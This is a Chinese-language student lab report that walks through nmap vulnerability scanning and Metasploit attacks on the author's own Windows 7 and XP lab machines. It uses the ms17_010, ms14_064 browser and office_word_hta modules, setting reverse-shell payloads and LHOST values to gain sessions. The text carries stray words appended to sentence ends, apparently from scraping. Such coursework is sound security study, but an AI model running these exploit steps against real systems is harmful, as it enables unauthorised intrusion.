Exp5 MSF基礎應用

 

環境

 

  1. 主機:kali

    靶機:windows 七、win十、windows xp SP3 english、python

namp掃描

(https://blog.csdn.net/qq_29277155/article/details/50977143) 此博客有較多闡述算法

0x01 nmap 的介紹

     Nmap是一個網絡鏈接端掃描軟件,用來掃描網上電腦開放的網絡鏈接端。肯定哪些服務運行在哪些鏈接端,而且推斷計算機運行哪一個操做系統(這是亦稱 fingerprinting)。它是網絡管理員必用的軟件之一,以及用以評估網絡系統安全。shell

      在長達3.5年以後,Fyodor終於發佈了著名開源網絡檢索工具的最新版本Nmap7。Nmap是最受歡迎的開源網絡映射器之一此外,Nmap7這款自動化的掃描器可以輕易檢測到Heartbleed、POODLE、FREAK等嚴重漏洞。Nmap7中對ssl-enum-ciphers(SSL枚舉密碼)腳本替換了新的實現算法,使得它可以經過枚舉SSL/TLS協議版本和密碼套件來快速分析TLS鏈接,它還可以迅速識別部署問題。另外,使用Nmap7可以輕易發現包含漏洞的服務器,Nmap7中包含了對提速和掃描實現的改進。這個工具的新版本包括一個更新、更快的Nmap腳本引擎(Nmap Scripting Engine,NSE),同時它還容許用戶編寫Lua腳本。windows

0x02 使用nmap 檢測多種漏洞     對win7 操做

      使用namp 對這些被掃描工具掃描出來的漏洞進行人工手動驗證,這些僅是命令,至於如何根據出現的結果進行判斷是否有漏洞,這個在結果中很容易看出,例如出現 vulnerable-有漏洞; not vulnerable-無漏洞。  有結果出來-有漏洞;無結果出來-無漏洞,日後在其餘測試中,只須要將scanme.nmap.org 替換成帶驗證的目標IP 或者網站。瀏覽器

nmap --script=vuln xxxx

  挖出了一個ms17_010漏洞安全

輸入: msfdb run 打開了msfconle

 

search ms17_010

注意第三個選項,這是我本身在exploit database 上下載下來的,而後導入到msf中的,但是沒想到也是基於ms17-010的,ruby

在本次實驗中我嘗試了第3、4、五個來對win7進行攻擊,效果很好,都成功了服務器

首先選擇的是本身從exploit database 上導入的  439(名字瞎編的) 網絡

輸入show options 後觀察須要設置的參數
set payload  generic/shell_reverse_tcp
set LHOST xxx
set  smbuser xxx
set  smbpass xxx

  雖然結果成功了,可是這依然須要用戶名與密碼,我以爲這樣其實也不怎麼厲害session

接下來選擇用   windows/smb/ms17_010_psexec 與上面差很少

 

 

針對瀏覽器攻擊

因爲對與上一步win7攻擊的成功,因而我用來攻擊IE

2015年3月微軟確認將放棄IE品牌。轉而在windows 10上,Microsoft Edge取代了,因此IE最終版是IE11(win10)

首先我預想的是攻擊win10,因此找了一個很新的漏洞,然而,大神是用python寫的。而想要導入msf中只能用.rb的文件,涼涼

因此,我以爲黑客的知識面應該是至關普遍的,廣而深的

在msf自帶的漏洞庫裏也有針對IE11的

然而攻擊效果是這樣的,什麼反應也沒有

 

 

而後不甘心的退而求其次,轉攻win7的IE7     

 

而後我谷歌了一下。。。。。。。沒有解決。待定。。。。

後來上網搜了一下,知道了msf自動化測試,我以爲能夠試一試

search autopwn

 而後選擇、設置,但是還出現了問題,永遠不知道下一步的探索

只好去測試xp

選擇了

use winndows/browser/ms14_064_ole_code_execution

  

set SRVHOST xxx    
set payload xxx       
set LHOST xxx         
exploit

而後在xp系統中打開ie,輸入url訪問,

 

成功的拿到了session ,測試成功

利用office_word_hta模塊攻擊win7

這個評價是excellent想必是不錯的啦

這個依然同上,使用show options 查看設置參數就ok

在靶機上訪問URL運行一下文件就OK

 

 

後經同窗指點知道一個鏈接網絡的方法:  將靶機與攻擊機都設置爲橋接模式,而後用手機開個熱點,但不開流量,這樣的話就至關與手機充當路由器的功能,並且不耗費流量,即可實現兩臺虛擬機的通訊,很贊。

 

  • Exploit模塊
    • 是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,以植入和運行攻擊載荷,從而得到對遠程目標系統訪問權的代碼組件。
    • 形象點來講就是攻擊模塊
  • Payload模塊
    • 是在滲透成功後促使目標系統運行的一端植入代碼,一般做用是爲滲透攻擊者打開在目標系統上的控制會話鏈接。實際上,該模塊就是計算機集成的針對不一樣操做系統實現shellcode攻擊的ruby代碼。
  • Encoder模塊
    • 針對payload進行編碼,能夠經過多種編碼手段、屢次編碼方式有效的改變payload代碼特徵
    • 不改變payload做用,但能對payload進行加工
  • Aux模塊
    • 可以幫助滲透測試中在進行滲透攻擊以前獲得的目標系統豐富的情報信息,從而發起更具目標性的精準攻擊。
    • 主要包括針對各類網絡服務的掃描和查點、構建虛假服務收集登陸密碼、口令猜想破解、敏感信息嗅探、探查敏感信息泄露、Fuzz測試發掘漏洞、實施網絡協議欺騙等模塊。
  • Post模塊
    • 支持在滲透攻擊取得目標系統遠程控制權以後,在受控系統中進行給各樣的後滲透攻擊動做。
    • 這裏主要指的是攻擊以後可能用到的模塊
  • Nops模塊
    • 是一些對程序運行狀態不會形成任何實質影響的空操做或無關操做指令,最典型的空指令就是空操做,在X86 CPU體系架構平臺上的操做碼是0x90

由於有些代碼返回地址很難確認,因此在實際中有時候會填充一大段空指令,便於快速肯定返回地址的位置

 實驗體會:

路漫漫其修遠兮,吾將上下而求索

相關文章
相關標籤/搜索